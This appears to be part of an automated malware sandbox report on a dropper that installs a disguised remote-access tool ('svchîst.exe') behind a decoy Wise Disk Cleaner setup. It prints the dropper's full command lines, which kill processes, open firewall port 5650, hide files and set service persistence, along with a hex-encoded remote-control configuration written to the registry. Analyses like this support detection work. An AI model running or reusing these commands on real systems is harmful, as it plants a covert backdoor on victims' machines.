C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\install.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\ C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz C:\Windows\SysWOW64\drivers\install.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
Token: SeBackupPrivilege N/A C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1096 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe C:\Windows\SysWOW64\cmd.exe
PID 1096 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe C:\Windows\SysWOW64\cmd.exe
PID 1096 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe C:\Windows\SysWOW64\cmd.exe
PID 1096 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe C:\Windows\SysWOW64\cmd.exe
PID 1096 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe C:\Windows\SysWOW64\cmd.exe
PID 1096 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe C:\Windows\SysWOW64\cmd.exe
PID 1096 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe C:\Windows\SysWOW64\cmd.exe
PID 1096 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe C:\Windows\SysWOW64\cmd.exe
PID 1312 wrote to memory of 1540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1312 wrote to memory of 1540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1312 wrote to memory of 1540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1312 wrote to memory of 1540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1196 wrote to memory of 1660 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1196 wrote to memory of 1660 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1196 wrote to memory of 1660 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1196 wrote to memory of 1660 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1196 wrote to memory of 280 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1196 wrote to memory of 280 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1196 wrote to memory of 280 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1196 wrote to memory of 280 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1096 wrote to memory of 676 N/A C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe
PID 1096 wrote to memory of 676 N/A C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe
PID 1096 wrote to memory of 676 N/A C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe
PID 1096 wrote to memory of 676 N/A C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe
PID 1096 wrote to memory of 676 N/A C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe
PID 1096 wrote to memory of 676 N/A C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe
PID 1096 wrote to memory of 676 N/A C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe
PID 1312 wrote to memory of 620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1312 wrote to memory of 620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1312 wrote to memory of 620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1312 wrote to memory of 620 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1312 wrote to memory of 644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1312 wrote to memory of 644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1312 wrote to memory of 644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1312 wrote to memory of 644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1312 wrote to memory of 1092 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 1312 wrote to memory of 1092 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 1312 wrote to memory of 1092 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 1312 wrote to memory of 1092 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 676 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp
PID 676 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp
PID 676 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp
PID 676 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp
PID 676 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp
PID 676 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp
PID 676 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp
PID 1312 wrote to memory of 1524 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1312 wrote to memory of 1524 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1312 wrote to memory of 1524 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1312 wrote to memory of 1524 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1312 wrote to memory of 1932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 1312 wrote to memory of 1932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 1312 wrote to memory of 1932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 1312 wrote to memory of 1932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 1312 wrote to memory of 1932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 1312 wrote to memory of 1932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 1312 wrote to memory of 1932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 1932 wrote to memory of 1768 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1932 wrote to memory of 1768 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1932 wrote to memory of 1768 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1932 wrote to memory of 1768 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1932 wrote to memory of 1560 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1932 wrote to memory of 1560 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 1932 wrote to memory of 1560 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe

"C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rutserv.exe

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service\Parameters\AppExit" /t REG_SZ /d "Restart" /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rfusclient.exe

C:\Windows\SysWOW64\netsh.exe

netsh firewall add portopening TCP 5650 "Open Port 5650"

C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp" /SL5="$201A8,3793825,188928,C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe" /VERYSILENT /LANG=ru /TASKS=desktopicon

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SYSTEM\Remote Manipulator System" /f

C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe

"C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe" /VERYSILENT /LANG=ru /TASKS=desktopicon

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service" /v FailureActions /t REG_BINARY /d 0000000000000000000000000300000057005300010000000000000001000000000000000100000000000000 /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service\Parameters\AppExit" /t REG_SZ /d "Restart" /f& REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service" /v FailureActions /t REG_BINARY /d 0000000000000000000000000300000057005300010000000000000001000000000000000100000000000000 /f& Exit

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c if exist "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg" (goto& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit) else taskkill /f /im rutserv.exe& taskkill /f /im rfusclient.exe& reg delete "HKLM\SYSTEM\Remote Manipulator System" /f& netsh firewall add portopening TCP 5650 "Open Port 5650"& netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650& "%SYSTEMROOT%\System32\drivers\install.exe"& ping 127.0.0.1& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /silentinstall&"%SYSTEMROOT%\System32\drivers\svchîst.exe" /firewall& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /start& Echo Windows Registry Editor Version 5.00> %SYSTEMROOT%\System32\idfgvgjnghcdfb.reg& attrib +h +s "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg"& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650

C:\Windows\SysWOW64\cmd.exe

